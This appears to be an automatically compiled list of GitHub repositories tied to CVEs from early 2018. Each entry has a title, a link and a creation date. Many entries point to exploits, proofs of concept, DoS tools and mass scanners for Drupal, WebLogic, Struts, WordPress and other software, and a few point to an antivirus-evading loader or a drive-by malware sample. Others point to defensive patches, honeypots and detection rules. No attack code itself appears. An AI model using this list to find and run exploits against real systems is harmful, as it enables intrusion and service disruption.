**Vuln checker for Drupal v7.x + v8.x (CVE-2018-7600 / SA-CORE-2018-002)** : [Damian972/drupalgeddon-2](https://github.com/Damian972/drupalgeddon-2) create time: 2018-05-01T01:38:43Z

**(CVE-2018-9995) Get DVR Credentials** : [ezelf/CVE-2018-9995_dvr_credentials](https://github.com/ezelf/CVE-2018-9995_dvr_credentials) create time: 2018-04-29T20:00:06Z

**My first Android app: Launch Fusée Gelée payloads from stock Android (CVE-2018-6242)** : [DavidBuchanan314/NXLoader](https://github.com/DavidBuchanan314/NXLoader) create time: 2018-04-28T11:50:00Z

**no description** : [ymgh96/Detecting-the-CVE-2018-1026-and-its-patch](https://github.com/ymgh96/Detecting-the-CVE-2018-1026-and-its-patch) create time: 2018-04-28T11:28:11Z

**no description** : [Al1ex/CVE-2017-7269](https://github.com/Al1ex/CVE-2017-7269) create time: 2018-04-28T04:11:45Z

**Simple IOCTL dispatcher for CVE-2018-8060/8061** : [otavioarj/SIOCtl](https://github.com/otavioarj/SIOCtl) create time: 2018-04-27T19:45:20Z

**Drupalgeddon2 POC + Scanner (adapted)** : [fyraiga/CVE-2018-7600-drupalgeddon2-scanner](https://github.com/fyraiga/CVE-2018-7600-drupalgeddon2-scanner) create time: 2018-04-27T04:11:43Z

**CVE-2018-10467** : [alt3kx/CVE-2018-10467](https://github.com/alt3kx/CVE-2018-10467) create time: 2018-04-27T03:35:47Z

**POC to test/exploit drupal vulnerability SA-CORE-2018-004 / CVE-2018-7602** : [1337g/Drupalgedon3](https://github.com/1337g/Drupalgedon3) create time: 2018-04-27T01:59:31Z

**CVE-2018-9160** : [mechanico/sickrageWTF](https://github.com/mechanico/sickrageWTF) create time: 2018-04-26T05:49:09Z

**CVE-2017-16995(Ubuntu本地提权漏洞)** : [Al1ex/CVE-2017-16995](https://github.com/Al1ex/CVE-2017-16995) create time: 2018-04-26T04:33:50Z

**Composr CMS 10.0.13 Cross Site Scripting(XSS) Assigned CVE Number: CVE-2018-6518** : [faizzaidi/Composr-CMS-10.0.13-Cross-Site-Scripting-XSS](https://github.com/faizzaidi/Composr-CMS-10.0.13-Cross-Site-Scripting-XSS) create time: 2018-04-25T16:35:41Z

**CVE-2017-9506 - SSRF** : [random-robbie/Jira-Scan](https://github.com/random-robbie/Jira-Scan) create time: 2018-04-25T11:25:18Z

**Tool to dive Apache logs for evidence of exploitation of CVE-2018-7600** : [Hestat/drupal-check](https://github.com/Hestat/drupal-check) create time: 2018-04-24T14:34:46Z

**CVE-2018-6574 POC : golang 'go get' remote command execution during source code build** : [neargle/CVE-2018-6574-POC](https://github.com/neargle/CVE-2018-6574-POC) create time: 2018-04-24T03:44:20Z

**no description** : [bloomer1016/CVE-2017-11882-Possible-Remcos-Malspam](https://github.com/bloomer1016/CVE-2017-11882-Possible-Remcos-Malspam) create time: 2018-04-23T03:07:25Z

**:hocho: CRIME attack PoC : a compression oracle attacks CVE-2012-4929 :hocho:** : [mpgn/CRIME-poc](https://github.com/mpgn/CRIME-poc) create time: 2018-04-21T09:28:31Z

**no description** : [mudhappy/Wordpress-Hack-CVE-2018-6389](https://github.com/mudhappy/Wordpress-Hack-CVE-2018-6389) create time: 2018-04-20T17:45:38Z

**CalderaForms 1.5.9.1 XSS (WordPress plugin) - tutorial** : [mindpr00f/CVE-2018-7747](https://github.com/mindpr00f/CVE-2018-7747) create time: 2018-04-20T15:49:23Z

**no description** : [ymgh96/Detecting-the-patch-of-CVE-2018-1010](https://github.com/ymgh96/Detecting-the-patch-of-CVE-2018-1010) create time: 2018-04-20T09:50:40Z

**no description** : [xssfile/CVE-2017-8464-EXP](https://github.com/xssfile/CVE-2017-8464-EXP) create time: 2018-04-20T09:01:03Z

**no description** : [shaoshore/CVE-2018-2628](https://github.com/shaoshore/CVE-2018-2628) create time: 2018-04-20T02:14:21Z

**no description** : [Shadowshusky/CVE-2018-2628all](https://github.com/Shadowshusky/CVE-2018-2628all) create time: 2018-04-20T01:24:17Z

**no description** : [9uest/CVE-2018-2628](https://github.com/9uest/CVE-2018-2628) create time: 2018-04-19T15:56:49Z

**macOS 10.13.3 (17D47) Safari Wasm Exploit** : [FSecureLABS/CVE-2018-4121](https://github.com/FSecureLABS/CVE-2018-4121) create time: 2018-04-19T08:33:12Z

**Exploit for CVE-2018-7600.. called drupalgeddon2,** : [lorddemon/drupalgeddon2](https://github.com/lorddemon/drupalgeddon2) create time: 2018-04-19T03:31:47Z

**CVE-2018-2628** : [hawk-520/CVE-2018-2628](https://github.com/hawk-520/CVE-2018-2628) create time: 2018-04-19T03:19:15Z

**WebLogic WLS核心组件反序列化漏洞多线程批量检测脚本 CVE-2018-2628-MultiThreading** : [aedoo/CVE-2018-2628-MultiThreading](https://github.com/aedoo/CVE-2018-2628-MultiThreading) create time: 2018-04-18T17:50:29Z

**no description** : [zjxzjx/CVE-2018-2628-detect](https://github.com/zjxzjx/CVE-2018-2628-detect) create time: 2018-04-18T17:28:44Z

**no description** : [jiansiting/weblogic-cve-2018-2628](https://github.com/jiansiting/weblogic-cve-2018-2628) create time: 2018-04-18T16:04:17Z

**CVE-2018-2628** : [skydarker/CVE-2018-2628](https://github.com/skydarker/CVE-2018-2628) create time: 2018-04-18T10:50:09Z

**CVE-2018-2628 & CVE-2018-2893** : [shengqi158/CVE-2018-2628](https://github.com/shengqi158/CVE-2018-2628) create time: 2018-04-18T05:41:23Z

**CVE-2018-2628** : [forlin/CVE-2018-2628](https://github.com/forlin/CVE-2018-2628) create time: 2018-04-18T02:56:39Z

**Exploit for Drupal 7 <= 7.57 CVE-2018-7600** : [pimps/CVE-2018-7600](https://github.com/pimps/CVE-2018-7600) create time: 2018-04-17T15:38:15Z

**POC for CVE-2018-1273** : [wearearima/poc-cve-2018-1273](https://github.com/wearearima/poc-cve-2018-1273) create time: 2018-04-17T13:41:00Z

**CVE-2018-7600 - Drupal 7.x RCE** : [FireFart/CVE-2018-7600](https://github.com/FireFart/CVE-2018-7600) create time: 2018-04-16T20:16:21Z

**This is a Java program that exploits Spring Break vulnerability (CVE-2017-8046).** : [jkutner/spring-break-cve-2017-8046](https://github.com/jkutner/spring-break-cve-2017-8046) create time: 2018-04-16T16:54:05Z

**CVE-2018-6546-Exploit** : [securifera/CVE-2018-6546-Exploit](https://github.com/securifera/CVE-2018-6546-Exploit) create time: 2018-04-15T21:42:20Z

**Tool to check for CVE-2018-7600 vulnerability on several URLS** : [sl4cky/CVE-2018-7600-Masschecker](https://github.com/sl4cky/CVE-2018-7600-Masschecker) create time: 2018-04-15T14:56:35Z

**Testing and exploitation tool for Drupalgeddon 2 (CVE-2018-7600)** : [sl4cky/CVE-2018-7600](https://github.com/sl4cky/CVE-2018-7600) create time: 2018-04-15T12:01:41Z

**Proof-of-Concept for Drupal CVE-2018-7600 / SA-CORE-2018-002** : [thehappydinoa/CVE-2018-7600](https://github.com/thehappydinoa/CVE-2018-7600) create time: 2018-04-15T02:21:59Z

**PoC for CVE-2018-7600 Drupal SA-CORE-2018-002 (Drupalgeddon 2).** : [dwisiswant0/CVE-2018-7600](https://github.com/dwisiswant0/CVE-2018-7600) create time: 2018-04-14T18:26:26Z

**MSF exploit module for Drupalgeddon 2 (CVE-2018-7600 / SA-CORE-2018-002)** : [jirojo2/drupalgeddon2](https://github.com/jirojo2/drupalgeddon2) create time: 2018-04-14T12:26:10Z

**Drupal 0day Remote PHP Code Execution (Perl)** : [dr-iman/CVE-2018-7600-Drupal-0day-RCE](https://github.com/dr-iman/CVE-2018-7600-Drupal-0day-RCE) create time: 2018-04-14T09:02:54Z

**Environment for CVE-2018-1273 (Spring Data Commons)** : [knqyf263/CVE-2018-1273](https://github.com/knqyf263/CVE-2018-1273) create time: 2018-04-13T13:41:02Z

**CVE-2018-7600 (Drupal)** : [knqyf263/CVE-2018-7600](https://github.com/knqyf263/CVE-2018-7600) create time: 2018-04-13T10:04:36Z

**Exploit for Drupal v7.x + v8.x (Drupalgeddon 2 / CVE-2018-7600 / SA-CORE-2018-002)** : [dreadlocked/Drupalgeddon2](https://github.com/dreadlocked/Drupalgeddon2) create time: 2018-04-12T22:53:14Z

**no description** : [genxor/CVE-2018-1270_EXP](https://github.com/genxor/CVE-2018-1270_EXP) create time: 2018-04-12T09:54:34Z

**Example exploit for CVE-2016-5195** : [xpcmdshell/derpyc0w](https://github.com/xpcmdshell/derpyc0w) create time: 2018-04-11T19:38:13Z

**Apache Tomcat 安全绕过漏洞 Poc** : [Pa55w0rd/CVE-2018-1305](https://github.com/Pa55w0rd/CVE-2018-1305) create time: 2018-04-11T01:37:58Z

**Fixed No Virus Manual Automatic Loader exe no zip because zip picks up the anti virus detector.** : [eonrickity/CVE-2017-0213](https://github.com/eonrickity/CVE-2017-0213) create time: 2018-04-10T18:34:17Z

**CVE-2017-8570生成脚本(CVE-2017-0199另一种利用方式)** : [SwordSheath/CVE-2017-8570](https://github.com/SwordSheath/CVE-2017-8570) create time: 2018-04-08T10:07:17Z

**Typo3 -v9.1.0 Persistent Cross Site Scripting(XSS) Assigned CVE Number: CVE-2018-6905** : [pradeepjairamani/TYPO3-XSS-POC](https://github.com/pradeepjairamani/TYPO3-XSS-POC) create time: 2018-04-08T06:34:34Z

**Spring messaging STOMP protocol RCE** : [CaledoniaProject/CVE-2018-1270](https://github.com/CaledoniaProject/CVE-2018-1270) create time: 2018-04-07T00:14:33Z

**Flash Exploit Poc** : [SyFi/CVE-2018-4878](https://github.com/SyFi/CVE-2018-4878) create time: 2018-04-04T04:33:44Z

**D-Link DSL-3782 Code Execution (Proof of Concept)** : [SECFORCE/CVE-2018-8941](https://github.com/SECFORCE/CVE-2018-8941) create time: 2018-04-03T21:22:34Z

**Cooolsoft PowerFTP Server 2.0 3/2.10 - Multiple Denial of Service Vulnerabilities** : [alt3kx/CVE-2001-0932](https://github.com/alt3kx/CVE-2001-0932) create time: 2018-04-03T02:21:39Z

**Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP GET request, possibly triggering a buffer overflow.** : [alt3kx/CVE-2002-0201](https://github.com/alt3kx/CVE-2002-0201) create time: 2018-04-03T02:15:51Z

**Phusion WebServer 1.0 - Directory Traversal** : [alt3kx/CVE-2002-0288](https://github.com/alt3kx/CVE-2002-0288) create time: 2018-04-03T02:06:11Z

**Phusion WebServer 1.0 - 'URL' Remote Buffer Overflow** : [alt3kx/CVE-2002-0289](https://github.com/alt3kx/CVE-2002-0289) create time: 2018-04-03T01:52:34Z

**Xerver 2.10 - Multiple Request Denial of Service Vulnerabilities** : [alt3kx/CVE-2002-0448](https://github.com/alt3kx/CVE-2002-0448) create time: 2018-04-03T01:38:08Z

**Nortel Wireless LAN Access Point 2200 Series - Denial of Service** : [alt3kx/CVE-2004-2549](https://github.com/alt3kx/CVE-2004-2549) create time: 2018-04-03T01:30:30Z

**IBM Proventia Sensor Appliance - Multiple Input Validation Vulnerabilities** : [alt3kx/CVE-2007-3830](https://github.com/alt3kx/CVE-2007-3830) create time: 2018-04-03T01:18:41Z

**Airsensor M520 - HTTPd Unauthenticated Remote Denial of Service / Buffer Overflow (PoC)** : [alt3kx/CVE-2007-5036](https://github.com/alt3kx/CVE-2007-5036) create time: 2018-04-03T01:09:40Z

**March Networks DVR 3204 - Logfile Information Disclosure** : [alt3kx/CVE-2007-6638](https://github.com/alt3kx/CVE-2007-6638) create time: 2018-04-03T00:36:34Z

**Symantec Altiris Client Service 6.8.378 - Local Privilege Escalation** : [alt3kx/CVE-2008-6827](https://github.com/alt3kx/CVE-2008-6827) create time: 2018-04-03T00:08:23Z

**Cisco VPN Client - Integer Overflow Denial of Service** : [alt3kx/CVE-2009-4118](https://github.com/alt3kx/CVE-2009-4118) create time: 2018-04-02T23:19:47Z

**A code demonstrating CVE-2018-0886** : [preempt/credssp](https://github.com/preempt/credssp) create time: 2018-04-02T12:52:07Z

**no description** : [acole76/cve-2018-6574](https://github.com/acole76/cve-2018-6574) create time: 2018-04-02T03:34:29Z

**tomcat7.x远程命令执行** : [Shellkeys/CVE-2017-12615](https://github.com/Shellkeys/CVE-2017-12615) create time: 2018-04-01T15:22:51Z

**An implementation of CVE-2016-0974 for the Nintendo Wii.** : [Fullmetal5/FlashHax](https://github.com/Fullmetal5/FlashHax) create time: 2018-04-01T00:39:28Z

**💀Proof-of-Concept for CVE-2018-7600 Drupal SA-CORE-2018-002** : [a2u/CVE-2018-7600](https://github.com/a2u/CVE-2018-7600) create time: 2018-03-30T14:23:18Z

**CVE-2018-7600 Drupal RCE** : [g0rx/CVE-2018-7600-Drupal-RCE](https://github.com/g0rx/CVE-2018-7600-Drupal-RCE) create time: 2018-03-30T08:52:54Z

**no description** : [lucad93/CVE-2018-3810](https://github.com/lucad93/CVE-2018-3810) create time: 2018-03-29T14:04:11Z

**PoC Exploit for CVE-2018-8820** : [hateshape/frevvomapexec](https://github.com/hateshape/frevvomapexec) create time: 2018-03-27T16:09:46Z

**CVE-2017-14322 Interspire Email Marketer (emailmarketer) Exploit** : [joesmithjaffa/CVE-2017-14322](https://github.com/joesmithjaffa/CVE-2017-14322) create time: 2018-03-27T13:20:31Z

**(https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11503** : [wizardafric/download](https://github.com/wizardafric/download) create time: 2018-03-26T16:35:17Z

**Demo for https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8970** : [tiran/CVE-2018-8970](https://github.com/tiran/CVE-2018-8970) create time: 2018-03-25T11:22:47Z

**Writeup of CVE-2017-1002101 with sample "exploit"/escape** : [bgeesaman/subpath-exploit](https://github.com/bgeesaman/subpath-exploit) create time: 2018-03-22T19:26:12Z

**no description** : [likescam/CVE-2017-0199](https://github.com/likescam/CVE-2017-0199) create time: 2018-03-22T08:40:55Z

**A version of CVE-2017-0213 that I plan to use with an Empire stager** : [jbooz1/CVE-2017-0213](https://github.com/jbooz1/CVE-2017-0213) create time: 2018-03-21T04:13:29Z

**This repository contains the POC of an exploit for node-jose < 0.11.0** : [zi0Black/POC-CVE-2018-0114](https://github.com/zi0Black/POC-CVE-2018-0114) create time: 2018-03-20T20:37:29Z

**Apache Struts CVE-2017-5638 RCE exploitation** : [ggolawski/struts-rce](https://github.com/ggolawski/struts-rce) create time: 2018-03-20T10:51:46Z

**Cleaned, scraped data of all 2,341 CISCE schools, primarily in India, in 2018. Data scraped from: http://www.cisce.org/locate-search.aspx?country=0&state=0&dist=0&city=0&location=&schooltype=&cve=&isc=&icse=&schoolclassi=&school=&search=locate** : [deedy/cisce_schools_data](https://github.com/deedy/cisce_schools_data) create time: 2018-03-20T05:36:05Z

**Linux Kernel Version 4.14 - 4.4 (Ubuntu && Debian)** : [C0dak/CVE-2017-16995](https://github.com/C0dak/CVE-2017-16995) create time: 2018-03-19T11:58:20Z

**crash poc & Leak info PoC** : [bigric3/CVE-2018-4901](https://github.com/bigric3/CVE-2018-4901) create time: 2018-03-19T07:27:53Z

**no description** : [likescam/CVE-2017-0213](https://github.com/likescam/CVE-2017-0213) create time: 2018-03-19T04:04:05Z

**no description** : [nirdev/CVE-2016-3749-PoC](https://github.com/nirdev/CVE-2016-3749-PoC) create time: 2018-03-18T16:16:42Z

**Android Blueborne RCE CVE-2017-0781** : [marcinguy/android712-blueborne](https://github.com/marcinguy/android712-blueborne) create time: 2018-03-17T21:07:24Z

**CVE-2018-6789** : [c0llision/exim-vuln-poc](https://github.com/c0llision/exim-vuln-poc) create time: 2018-03-16T16:21:22Z

**no description** : [H3llozy/CVE-2018-4879](https://github.com/H3llozy/CVE-2018-4879) create time: 2018-03-16T04:04:55Z

**Oracle WebLogic WLS-WSAT Remote Code Execution Exploit (CVE-2017-10271)** : [s0wr0b1ndef/Oracle-WebLogic-WLS-WSAT](https://github.com/s0wr0b1ndef/Oracle-WebLogic-WLS-WSAT) create time: 2018-03-16T03:09:29Z

**Golang exploit for CVE-2017-5638** : [Greynad/struts2-jakarta-inject](https://github.com/Greynad/struts2-jakarta-inject) create time: 2018-03-14T12:04:34Z

**PoC of Remote Command Execution via Log injection on SAP NetWeaver AS JAVA CRM** : [erpscanteam/CVE-2018-2380](https://github.com/erpscanteam/CVE-2018-2380) create time: 2018-03-14T09:20:21Z

**cve-2018-8108** : [zlgxzswjy/BUI-select-xss](https://github.com/zlgxzswjy/BUI-select-xss) create time: 2018-03-14T04:32:01Z

**Exploit for Jenkins serialization vulnerability - CVE-2016-0792** : [s0wr0b1ndef/java-deserialization-exploits](https://github.com/s0wr0b1ndef/java-deserialization-exploits) create time: 2018-03-13T09:15:32Z

**PoC for SpringBreak (CVE-2017-8046)** : [FixYourFace/SpringBreakPoC](https://github.com/FixYourFace/SpringBreakPoC) create time: 2018-03-12T18:49:45Z

**Exploitation Tool for CVE-2017-3066 targeting Adobe Coldfusion 11/12** : [codewhitesec/ColdFusionPwn](https://github.com/codewhitesec/ColdFusionPwn) create time: 2018-03-12T16:44:12Z

**PoC code for CVE-2017-13253** : [tamirzb/CVE-2017-13253](https://github.com/tamirzb/CVE-2017-13253) create time: 2018-03-12T16:06:21Z

**no description** : [Hurdano/CVE-CISCO-2017-15805](https://github.com/Hurdano/CVE-CISCO-2017-15805) create time: 2018-03-12T10:50:34Z

**no description** : [fibonascii/CVE-2004-0558](https://github.com/fibonascii/CVE-2004-0558) create time: 2018-03-10T21:04:17Z

**This is a Java program that exploits Spring Break vulnerability (CVE-2017-8046).** : [m3ssap0/spring-break_cve-2017-8046](https://github.com/m3ssap0/spring-break_cve-2017-8046) create time: 2018-03-09T20:51:19Z

**YZMCMS v3.7最新版xss漏洞 CVE-2018-8078** : [AlwaysHereFight/YZMCMSxss](https://github.com/AlwaysHereFight/YZMCMSxss) create time: 2018-03-09T07:56:56Z

**Exploit iOS 11.2.x by ZIMPERIUM and semi-completed by me. Sandbox escapes on CVE-2018-4087.** : [joedaguy/Exploit11.2](https://github.com/joedaguy/Exploit11.2) create time: 2018-03-08T18:04:31Z

**WARNING: This is a vulnerable application to test the exploit for the Spring Break vulnerability (CVE-2017-8046). Run it at your own risk!** : [m3ssap0/SpringBreakVulnerableApp](https://github.com/m3ssap0/SpringBreakVulnerableApp) create time: 2018-03-08T15:29:44Z

**WordPress <= 4.9.4 - Application Denial of Service (DoS) | CVE2018-6389 | Vulnerability | Exploit | Attack** : [Palvinder-Singh/CVE2018-6389](https://github.com/Palvinder-Singh/CVE2018-6389) create time: 2018-03-08T10:42:22Z

**no description** : [thariyarox/tomcat_CVE-2018-1304_testing](https://github.com/thariyarox/tomcat_CVE-2018-1304_testing) create time: 2018-03-08T10:12:22Z

**Improved DOS exploit for wordpress websites (CVE-2018-6389)** : [s0md3v/Shiva](https://github.com/s0md3v/Shiva) create time: 2018-03-04T14:25:09Z

**Tries to exploit a WordPress vulnerability (CVE-2018-6389) which can be used to cause a Denial of Service.** : [m3ssap0/wordpress_cve-2018-6389](https://github.com/m3ssap0/wordpress_cve-2018-6389) create time: 2018-03-04T13:33:15Z

**The Demo for CVE-2017-11427** : [CHYbeta/CVE-2017-11427-DEMO](https://github.com/CHYbeta/CVE-2017-11427-DEMO) create time: 2018-03-03T00:29:22Z

**Joomla - Component Google Map Landkarten <= 4.2.3 - SQL Injection** : [JavierOlmedo/joomla-cve-2018-6396](https://github.com/JavierOlmedo/joomla-cve-2018-6396) create time: 2018-03-02T21:46:28Z

**CVE-2018-6389 WordPress Core - 'load-scripts.php' Denial of Service <= 4.9.4** : [JavierOlmedo/wordpress-cve-2018-6389](https://github.com/JavierOlmedo/wordpress-cve-2018-6389) create time: 2018-03-01T20:19:14Z

**Jackson 反序列化** : [maxbitcoin/Jackson-CVE-2017-17485](https://github.com/maxbitcoin/Jackson-CVE-2017-17485) create time: 2018-03-01T16:09:20Z

**Source code and configuration files related to our article in MISC96** : [Synacktiv-contrib/exploiting-cve-2017-5123](https://github.com/Synacktiv-contrib/exploiting-cve-2017-5123) create time: 2018-03-01T11:03:08Z

**cve-2017-10271** : [JackyTsuuuy/weblogic_wls_rce_poc-exp](https://github.com/JackyTsuuuy/weblogic_wls_rce_poc-exp) create time: 2018-03-01T04:57:09Z

**This is a sort of Java porting of the Python exploit at: https://www.exploit-db.com/exploits/41570/.** : [m3ssap0/struts2_cve-2017-5638](https://github.com/m3ssap0/struts2_cve-2017-5638) create time: 2018-02-28T22:11:50Z

**A sandbox escape based on the proof-of-concept (CVE-2018-4087) by Rani Idan (Zimperium)** : [MTJailed/UnjailMe](https://github.com/MTJailed/UnjailMe) create time: 2018-02-28T14:45:06Z

**no description** : [alessiogilardi/PoC---CVE-2018-6389](https://github.com/alessiogilardi/PoC---CVE-2018-6389) create time: 2018-02-28T07:14:54Z

**no description** : [ww9210/cve-2017-7374](https://github.com/ww9210/cve-2017-7374) create time: 2018-02-27T21:22:01Z

**CVE-2018-4185: iOS 11.2-11.2.6 kernel pointer disclosure introduced by Apple's Meltdown mitigation.** : [bazad/x18-leak](https://github.com/bazad/x18-leak) create time: 2018-02-27T00:58:39Z

**no description** : [BlackRouter/cve-2018-6389](https://github.com/BlackRouter/cve-2018-6389) create time: 2018-02-26T10:45:27Z

**no description** : [MaxSecurity/Office-CVE-2017-8570](https://github.com/MaxSecurity/Office-CVE-2017-8570) create time: 2018-02-26T04:41:24Z

**Proof of Concept of vunerability CVE-2018-6389 on Wordpress 4.9.2** : [thechrono13/PoC---CVE-2018-6389](https://github.com/thechrono13/PoC---CVE-2018-6389) create time: 2018-02-25T22:06:05Z

**no description** : [knqyf263/CVE-2018-1304](https://github.com/knqyf263/CVE-2018-1304) create time: 2018-02-24T06:45:21Z

**CVE-2018-7197 Write up** : [Alyssa-o-Herrera/CVE-2018-7197](https://github.com/Alyssa-o-Herrera/CVE-2018-7197) create time: 2018-02-23T22:06:51Z

**CVE-2018-4878 样本** : [KathodeN/CVE-2018-4878](https://github.com/KathodeN/CVE-2018-4878) create time: 2018-02-23T19:24:40Z

**CVE-2018-4280: Mach port replacement vulnerability in launchd on iOS 11.2.6 leading to sandbox escape, privilege escalation, and codesigning bypass.** : [bazad/blanket](https://github.com/bazad/blanket) create time: 2018-02-23T00:19:05Z

**Clone of suds 0.4 + suds-0.4-CVE-2013-2217.patch** : [Osirium/suds](https://github.com/Osirium/suds) create time: 2018-02-22T15:07:09Z

**Multi-purpose proof-of-concept tool based on CPU-Z CVE-2017-15303** : [hfiref0x/Stryker](https://github.com/hfiref0x/Stryker) create time: 2018-02-22T05:31:13Z

**A PoC for CVE-2018-7250** : [Elvin9/SecDrvPoolLeak](https://github.com/Elvin9/SecDrvPoolLeak) create time: 2018-02-21T20:47:39Z

**A PoC for CVE-2018-7249** : [Elvin9/NotSecDrv](https://github.com/Elvin9/NotSecDrv) create time: 2018-02-21T20:31:09Z

**CVE-2018-4087 PoC** : [rani-i/bluetoothdPoC](https://github.com/rani-i/bluetoothdPoC) create time: 2018-02-21T12:55:37Z

**no description** : [RavSS/Bluetooth-Crash-CVE-2017-0785](https://github.com/RavSS/Bluetooth-Crash-CVE-2017-0785) create time: 2018-02-21T04:53:41Z

**no description** : [HanseSecure/CVE-2009-1437](https://github.com/HanseSecure/CVE-2009-1437) create time: 2018-02-19T14:26:18Z

**This is the original PoC of CVE-2018-7211** : [c3r34lk1ll3r/CVE-2018-7211-PoC](https://github.com/c3r34lk1ll3r/CVE-2018-7211-PoC) create time: 2018-02-18T10:47:00Z

**CVE-2017-10352 CVE-2017-10271 weblogic-XMLDecoder** : [bigsizeme/weblogic-XMLDecoder](https://github.com/bigsizeme/weblogic-XMLDecoder) create time: 2018-02-18T01:40:33Z

**Wordpress Username Enumeration /CVE-2017-5487,WordPress < 4.7.1 -** : [R3K1NG/wpUsersScan](https://github.com/R3K1NG/wpUsersScan) create time: 2018-02-17T05:59:49Z

**Containerized exploitable PhpCollab** : [jlk/exploit-CVE-2017-6090](https://github.com/jlk/exploit-CVE-2017-6090) create time: 2018-02-17T01:07:58Z

**CVE-2009-2698 compiled for CentOS 4.8** : [xiaoxiaoleo/CVE-2009-2698](https://github.com/xiaoxiaoleo/CVE-2009-2698) create time: 2018-02-16T16:17:24Z

**CVE-2016-4117** : [hybridious/CVE-2016-4117](https://github.com/hybridious/CVE-2016-4117) create time: 2018-02-15T22:05:08Z

**Struts02 s2-045 exploit program** : [0x00-0x00/CVE-2017-5638](https://github.com/0x00-0x00/CVE-2017-5638) create time: 2018-02-15T17:31:07Z

**Global Fix for Wordpress CVE-2018-6389** : [Jetserver/CVE-2018-6389-FIX](https://github.com/Jetserver/CVE-2018-6389-FIX) create time: 2018-02-15T14:00:14Z

**CVE-2015-5374 Denial of Service PoC** : [can/CVE-2015-5374-DoS-PoC](https://github.com/can/CVE-2015-5374-DoS-PoC) create time: 2018-02-14T22:12:54Z

**ChakraCore exploitation techniques** : [0xcl/cve-2016-7190](https://github.com/0xcl/cve-2016-7190) create time: 2018-02-13T20:35:04Z

**CVE-2018-6791 Troubleshooting** : [rarar0/KDE_Vuln](https://github.com/rarar0/KDE_Vuln) create time: 2018-02-12T21:21:29Z

**no description** : [zi0Black/CVE-2016-010033-010045](https://github.com/zi0Black/CVE-2016-010033-010045) create time: 2018-02-12T09:09:42Z

**Joomla!, Second Order SQL Injection** : [knqyf263/CVE-2018-6376](https://github.com/knqyf263/CVE-2018-6376) create time: 2018-02-12T05:02:52Z

**WolfCMS-v0.8.3.1 Cross Site Scripting(XSS) Assigned CVE Number: CVE-2018-6890** : [pradeepjairamani/WolfCMS-XSS-POC](https://github.com/pradeepjairamani/WolfCMS-XSS-POC) create time: 2018-02-11T12:43:41Z

**Aggressor Script to launch IE driveby for CVE-2018-4878** : [vysecurity/CVE-2018-4878](https://github.com/vysecurity/CVE-2018-4878) create time: 2018-02-10T09:30:18Z

**Aggressor Script to just launch IE driveby for CVE-2018-4878** : [hybridious/CVE-2018-4878](https://github.com/hybridious/CVE-2018-4878) create time: 2018-02-09T22:25:03Z

**Exploit for CVE-2017-11826** : [thatskriptkid/CVE-2017-11826](https://github.com/thatskriptkid/CVE-2017-11826) create time: 2018-02-09T17:20:53Z

**Ruby On Rails unrestricted render() exploit** : [0x00-0x00/CVE-2016-2098](https://github.com/0x00-0x00/CVE-2016-2098) create time: 2018-02-09T16:16:08Z

**PHPMailer < 5.2.18 Remote Code Execution Exploit** : [0x00-0x00/CVE-2016-10033](https://github.com/0x00-0x00/CVE-2016-10033) create time: 2018-02-09T14:53:51Z

**Metasploit module for WordPress DOS load-scripts.php CVE-2018-638** : [dsfau/wordpress-CVE-2018-6389](https://github.com/dsfau/wordpress-CVE-2018-6389) create time: 2018-02-09T14:37:44Z

**no description** : [mdsecactivebreach/CVE-2018-4878](https://github.com/mdsecactivebreach/CVE-2018-4878) create time: 2018-02-09T13:30:46Z

**Code put together from a few peoples ideas credit given don't use maliciously please** : [devcoinfet/CVE-2017-12617](https://github.com/devcoinfet/CVE-2017-12617) create time: 2018-02-09T01:02:32Z

**Modification of Metasploit module for RCE in Ruby-On-Rails Console CVE-2015-3224** : [0x00-0x00/CVE-2015-3224](https://github.com/0x00-0x00/CVE-2015-3224) create time: 2018-02-08T23:24:48Z

**At this project, we made a python exploit using buffer overflow at the CVE-2017-7679** : [snknritr/CVE-2017-7679-in-python](https://github.com/snknritr/CVE-2017-7679-in-python) create time: 2018-02-08T18:21:18Z

**A low interaction honeypot for the Cisco ASA component capable of detecting CVE-2018-0101, a DoS and remote code execution vulnerability.** : [Cymmetria/ciscoasa_honeypot](https://github.com/Cymmetria/ciscoasa_honeypot) create time: 2018-02-08T15:52:50Z

**glibc getcwd() local privilege escalation compiled binaries** : [0x00-0x00/CVE-2018-1000001](https://github.com/0x00-0x00/CVE-2018-1000001) create time: 2018-02-07T17:34:24Z

**no description** : [1337g/CVE-2018-0101-DOS-POC](https://github.com/1337g/CVE-2018-0101-DOS-POC) create time: 2018-02-07T16:25:59Z

**Patch Wordpress DOS breach (CVE-2018-6389) in PHP** : [JulienGadanho/cve-2018-6389-php-patcher](https://github.com/JulienGadanho/cve-2018-6389-php-patcher) create time: 2018-02-07T13:22:31Z

**WebLogic Honeypot is a low interaction honeypot to detect CVE-2017-10271 in the Oracle WebLogic Server component of Oracle Fusion Middleware. This is a Remote Code Execution vulnerability.** : [Cymmetria/weblogic_honeypot](https://github.com/Cymmetria/weblogic_honeypot) create time: 2018-02-07T06:11:23Z

**MICROS Honeypot is a low interaction honeypot to detect CVE-2018-2636 in the Oracle Hospitality Simphony component of Oracle Hospitality Applications (MICROS). This is a directory traversal vulnerability.** : [Cymmetria/micros_honeypot](https://github.com/Cymmetria/micros_honeypot) create time: 2018-02-07T05:54:46Z

**WordPress DoS (CVE-2018-6389)** : [knqyf263/CVE-2018-6389](https://github.com/knqyf263/CVE-2018-6389) create time: 2018-02-07T00:20:57Z

**A ModSecurity ruleset for detecting potential attacks using CVE-2018-6389** : [rastating/modsecurity-cve-2018-6389](https://github.com/rastating/modsecurity-cve-2018-6389) create time: 2018-02-06T22:51:21Z

**A tool i made for use in combination with hackerone.com for Bounty Hacking purposes.** : [websecnl/Bulk_CVE-1999-0532_Scanner](https://github.com/websecnl/Bulk_CVE-1999-0532_Scanner) create time: 2018-02-06T19:16:43Z

**malware del lado del cliente de explotacion de vulnerabilidad de internet explorer 6.0 SP1 en windows xp SP2. No requiere de consentimiento por parte del usuario y no descarga ningun archivo** : [Mario1234/js-driveby-download-CVE-2006-4777](https://github.com/Mario1234/js-driveby-download-CVE-2006-4777) create time: 2018-02-06T15:55:05Z

**CVE-2018-6389 Exploit In WordPress DoS** : [WazeHell/CVE-2018-6389](https://github.com/WazeHell/CVE-2018-6389) create time: 2018-02-06T15:16:03Z

